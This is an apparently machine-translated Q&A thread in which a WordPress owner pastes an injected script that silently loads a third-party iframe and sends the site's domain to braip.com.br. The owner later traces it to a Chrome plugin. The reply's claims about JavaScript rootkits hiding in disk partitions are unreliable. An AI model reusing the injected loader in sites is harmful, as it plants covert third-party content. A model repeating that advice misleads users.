2016-04-03 21 views
-3

こんにちは私のウェブサイトには悪意のあるスクリプトがあります。私はどこからでも見つけられません!Wordpressの悪意のあるスクリプト

私はインスペクタで確認し、それがこれを返します。

<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div> 
<div id="abrir_aba"></div> 
<div class="handle"></div> 

<script type="text/javascript"> 
    var relatedUrl = document.domain; 
    var protocol = window.location.protocol; 


    var idadv = document.createElement("iframe"); 
    with(idadv){ 
     id = "idadv"; 
     src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl; 
     scrolling = "no"; 
    } 
    document.getElementById("menu-bar").appendChild(idadv); 
</script> 

<script type="text/javascript"> 
    $("#menu-bar").slideReveal({ 
     trigger: $(".handle"), 
     push: false, 
     position: "right", 
     width: 50, 
     show: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"}); 
     }, 
     hidden: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"}); 
     }, 
    }); 

</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&amp;user=baixarfilme&amp;url=www.websiteladies.com" scrolling="no"></iframe></div> 

それは私のワードプレスの「メニューバー」に位置していますが、私はどこにでも何かを見つけることができません!そして、それは私のウェブサイトのSSL証明書が私のウェブサイトを私のクライアントに不快であるように見せかけることになります!信じられない !ここで

はURLです:http://www.websiteladies.com

任意のヘルプ?

答えて

1

私はこの問題を自分で持ち、それを取り除くには数時間かかることがあります。
JavaScriptまたはjQuery形式またはVBS形式になります。 HDDや外付けUSBの最上位に独自のパーティションを作成している可能性がありますので、パーティションを確認してください。

それはレジストリに自身の一部を添付しているので、あなたの検索時を知っているので、オンラインで修復することができます。テキストファイルや写真ファイルに自分自身を添付したルートキットとして起動している可能性があります。

Spybot SDをダウンロードしてから、オフラインにしてプログラムをインストールして実行してください。ウィルスが自身のパーティションを作成した場合、それを見つけてそのパーティションを完全に消去してから、そのパーティションの前にあるパーティションの拡張子になるように設定する必要があります。高速の「クイッククリーン」は機能しません。セクターマーカーのみをクリーンアップするからです。

私が知っているアンチウィルスやスパイボットのトラッカーは、隠しパーティションでは見えませんが、レジストリをきれいにして、隠されたルートキットを見つけることができます。
最近ダウンロードしてインストールしたものを覚えてください。
接続したUSBサムドライブを確認してください。
ウイルスのすべてのコンポーネントがなくなるまでオフラインにすることをおすすめします。私はいくつかのコンポーネントを隠したものを持っていたのウイルス対策プログラム。

+0

情報をいただきありがとうございます、それはChromeプラグインでした。信じられない! @FrenchyNYC。 – FrenchyNYC

+0

どういたしまして。 Google Chromeは私のお気に入りのブラウザですが、JSベースのルートキットの影響を非常に受けます。一年前、私はそのうちの231個が「クッキー」瓶の中にあるのを見つけました。私は今、キャッシュを一掃し、クッキージャーは頻繁に一週間に一度のようにきれいにします。 – Sparky256

関連する問題